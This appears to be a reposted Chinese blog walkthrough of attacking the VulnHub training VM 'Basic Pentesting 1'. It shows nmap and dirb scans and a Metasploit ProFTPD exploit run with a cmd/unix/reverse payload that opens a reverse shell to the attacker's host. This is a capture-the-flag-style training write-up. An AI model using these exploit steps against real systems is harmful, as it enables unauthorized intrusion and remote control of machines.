Basic penetration_1靶机渗透
项目地址
```plain https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova ```实验过程
开启靶机虚拟机
![](https://img-blog.csdnimg.cn/img_convert/4135d3c176bdca1f661f756b8321c97a.png)使用nmap进行主机发现,获取靶机IP地址
```plain nmap 192.168.47.1-254 ```根据对比可知Basic penetration:1的一个ip地址为192.168.47.168
扫描Basic penetration:1的操作系统,端口及对应服务
```plain nmap -A -p- 192.168.47.168 ```发现该靶机开放了21,22,80端口
目录扫描
```plain dirb http://192.168.47.168 ```信息收集
访问网站发现是apache框架
提权
```plain msfconsole search ProFTPD ```use 5
show options
set rhosts 192.168.47.168
set payload cmd/unix/reverse
set lhost 192.168.47.129
run
查看当前用户
提权成功
好小子,离成功又近一步!!!
原文地址:https://blog.csdn.net/weixin_67832625/article/details/142865273
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!